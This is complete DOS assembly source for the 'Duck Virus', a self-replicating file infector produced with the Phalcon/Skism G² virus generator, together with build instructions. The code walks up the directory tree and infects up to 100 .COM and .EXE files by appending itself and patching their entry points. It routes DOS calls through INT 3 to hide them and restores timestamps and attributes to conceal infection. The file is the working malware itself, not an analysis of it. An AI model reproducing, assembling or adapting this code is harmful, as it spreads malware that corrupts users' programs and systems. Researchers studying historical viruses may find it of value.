; Virus generated by Gý 0.70á ; Gý written by Dark Angel of Phalcon/Skism ; File: DUCK.ASM ; Duck Virus by White Shark id = 'DA' .model tiny .code ; Assemble with: ; TASM /m3 filename.ASM ; TLINK /t filename.OBJ org 0100h carrier: db 0E9h,0,0 ; jmp start start: mov bp, sp int 0003h next: mov bp, ss:[bp-6] sub bp, offset next push es push ds push cs pop ds push cs pop es mov ah, 0047h ; Get directory lea si, [bp+offset origdir+1] mov dl, 0000h ; Default drive int 0021h lea dx, [bp+offset newDTA] mov ah, 001Ah ; Set DTA int 0021h push ds push es mov ax, 3521h ; get int 21h handler int 0021h push es pop ds xchg bx, dx mov ax, 2503h ; set int 3 = int 21h handler int 0021h pop es pop ds lea di, [bp+offset origCSIP2] lea si, [bp+offset origCSIP] movsw movsw movsw movsw mov byte ptr [bp+numinfect], 0000h traverse_loop: lea dx, [bp+offset COMmask] call infect lea dx, [bp+offset EXEmask] call infect cmp [bp+numinfect], 0064h jae exit_traverse ; exit if enough infected mov ah, 003Bh ; CHDIR lea dx, [bp+offset dot_dot] ; go to previous dir int 0003h jnc traverse_loop ; loop if no error exit_traverse: lea si, [bp+offset origdir] mov byte ptr [si], '\' mov ah, 003Bh ; restore directory xchg dx, si int 0003h pop ds pop es mov ah, 001Ah ; restore DTA to default mov dx, 0080h ; in the PSP int 0003h cmp sp, id je restore_EXE restore_COM: mov di, 0100h push di lea si, [bp+offset old3_2] mov cx, 0003h ; Caution: far from the most efficient rep movsb ; routine return: ret restore_EXE: mov ax, es add ax, 0010h add cs:[bp+word ptr origCSIP2+2], ax add ax, cs:[bp+word ptr origSPSS2] cli mov ss, ax mov sp, cs:[bp+word ptr origSPSS2+2] sti db 00EAh origCSIP2 db ? old3_2 db ?,?,? origSPSS2 dd ? origCSIP db ? old3 db 0cdh,20h,0 origSPSS dd ? infect: mov ah, 004Eh ; find first mov cx, 0007h ; all files findfirstnext: int 0003h jc return cmp word ptr [bp+newDTA+34], 'NA' ; Check if COMMAND.COM mov ah, 004Fh ; Set up find next jz findfirstnext ; Exit if so mov ax, 4300h lea dx, [bp+newDTA+30] int 0003h jc return push cx push dx mov ax, 4301h ; clear file attributes push ax ; save for later use xor cx, cx int 0003h lea dx, [bp+newDTA+30] mov ax, 3D02h int 0003h xchg ax, bx mov ax, 5700h ; get file time/date int 0003h push cx push dx mov ah, 003Fh lea dx, [bp+offset readbuffer] mov cx, 001Ah int 0003h xor cx, cx mov ax, 4202h cwd int 0003h cmp word ptr [bp+offset readbuffer], 'ZM' jz checkEXE mov cx, word ptr [bp+offset readbuffer+1] ; jmp location add cx, heap-start+3 ; convert to filesize cmp ax, cx ; equal if already infected jz jmp_close lea di, [bp+offset old3] lea si, [bp+offset readbuffer] movsw movsb mov cx, 0003h sub ax, cx mov word ptr [bp+offset readbuffer+1], ax mov dl, 00E9h mov byte ptr [bp+offset readbuffer], dl jmp short continue_infect checkEXE: cmp word ptr [bp+offset readbuffer+10h], id jnz skipp jmp_close: jmp close skipp: lea si, [bp+readbuffer+14h] lea di, [bp+origCSIP] movsw ; Save original CS and IP movsw sub si, 000Ah movsw ; Save original SS and SP movsw push bx ; save file handle mov bx, word ptr [bp+readbuffer+8] ; Header size in paragraphs mov cl, 0004h shl bx, cl push dx ; Save file size on the push ax ; stack sub ax, bx ; File size - Header size sbb dx, 0000h ; DX:AX - BX -> DX:AX mov cx, 0010h div cx ; DX:AX/CX = AX Remainder DX mov word ptr [bp+readbuffer+0Eh], ax ; Para disp stack segment mov word ptr [bp+readbuffer+10h], id ; Initial SP mov word ptr [bp+readbuffer+16h], ax ; Para disp CS in module. mov word ptr [bp+readbuffer+14h], dx ; IP Offset pop ax ; Filelength in DX:AX pop dx add ax, heap-start adc dx, 0000h mov cl, 0009h push ax shr ax, cl ror dx, cl stc adc dx, ax pop ax and ah, 0001h mov word ptr [bp+readbuffer+4], dx ; Fix-up the file size in mov word ptr [bp+readbuffer+2], ax ; the EXE header. pop bx ; restore file handle mov cx, 001Ah continue_infect: push cx ; save # bytes to write lea dx, [bp+offset start] mov ah, 0040h ; concatenate virus mov cx, heap-start int 0003h xor dx, dx mov ax, 4200h xor cx, cx int 0003h lea dx, [bp+offset readbuffer] mov ah, 0040h pop cx int 0003h inc [bp+numinfect] close: mov ax, 5701h ; restore file time/date pop dx pop cx int 0003h mov ah, 003Eh int 0003h pop ax ; restore file attributes pop dx ; get filename and pop cx ; attributes from stack int 0003h mov ah, 004Fh ; find next jmp findfirstnext signature db '[PS/Gý]',0 ; Phalcon/Skism Gý creator db 'White Shark',0 virusname db 'Duck Virus',0 EXEmask db '*.EXE',0 COMmask db '*.COM',0 dot_dot db '..',0 heap: newDTA db 43 dup (?) origdir db 65 dup (?) numinfect db ? readbuffer db 1ah dup (?) endheap: end carrier